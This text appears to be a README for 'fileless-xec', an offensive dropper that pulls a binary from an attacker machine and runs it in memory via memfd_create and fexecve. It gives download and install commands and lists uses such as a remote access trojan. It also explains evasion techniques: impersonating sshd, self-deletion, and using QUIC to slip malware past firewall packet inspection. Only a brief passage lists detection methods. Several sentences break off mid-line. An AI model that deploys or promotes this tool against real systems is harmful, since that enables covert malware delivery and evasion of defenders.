Fileless-Xec is a Stealth Dropper Executing Remote Binaries Without Dropping Them On Disk
fileless-xec is used on target machine to stealthy execute a binary file located on attacker machine
fileless-xec enable us to execute a remote binary on a local machine directly from memory without dropping them on disk
curl -lO -L https://github.com/ariary/fileless-xec/releases/latest/download/fileless-xec
curl -lO -L https://github.com/ariary/fileless-xec/releases/latest/download/fileless-xec_windows.exe
Clone the repo and download the dependencies locally:
git clone https://github.com/ariary/fileless-xec.git
To build the fileless-xec for linux
To build the fileless-xec for windows
$GOPATH is in your
go install github.com/ariary/fileless-xec/cmd/fileless-xec
We want to execute
writeNsleep binary locate on a remote machine, locally.
We first start a python http server on remote. Locally we use
fileless-xec and impersonate the
/usr/sbin/sshd name for the execution of the binary
writeNsleep(for steal thiness & fun). Once write N sleep started fileless-xec will delete itself (
Other use cases
- Execute binary with stdout/stdin
- Execute binary with arguments
- Bypass network restriction using ICMP
- Bypass firewall with HTTP3
- “Remote go”: execute go binaries without having go installed locally
- Execute a shell script
- RAT (Remote Access Trojan) scenario
Steal thiness story
- The binary file is not mapped into the host file system
- The execution program name could be customizable
- Bypass 3rd generation firewall could be done with http3 support
fileless-xecself removes once launched
The remote binary file is stored locally using
memfd_create syscall, which store it within a memory disk which is not mapped into the file system (ie you can’t find it using
Then we execute it using
fexecve syscall (as it is currently not provided by
syscall golang library we implem it).
fexecve we could exec a program, but we reference the program to run using a file descriptor, instead of the full path.
|Enable it with |
You can setup a light web rootfs server supporting http3 by running
QUIC UDP aka
http3 is a new generation Internet protocol that speeds online web applications that are susceptible to delay, such as searching, video streaming etc., by reducing the round-trip time (RTT) needed to connect to a server.
Because QUIC uses proprietary encryption equivalent to TLS (this will change in the future with a standardized version), 3rd generation firewalls that provide application control and visibility encounter difficulties to control and monitor QUIC traffic.
If you actually use
fileless-xec as a dropper (Only for testing purpose or with the authorization), you likely want to execute some type of malwares or other file that could be drop by packet analysis. Hence, with Quic enables you could bypass packet analysis and GET a malware.
Also, in case firewall is only used for allowing/blocking traffic it could happen that firewall rules forget the udp protocol making your requests go under the radars
Although not present on the memory disk, the running program can still be detected using
ps command for example.
- Cover the tracks with a fake program name
fileless-xec --name <fake_name> <binary_raw_url> by default the name is
- Detach from tty to map behaviour of deamon process
setsid fileless-xec <binary_raw_url>. WIP call
setsid from code
You could still be detected with:
$ lsof | grep memfd
opensnoop (but not by
Or seccomp profile auditing
execve syscall (but it is very overwhelming as a
sleep command also use execve)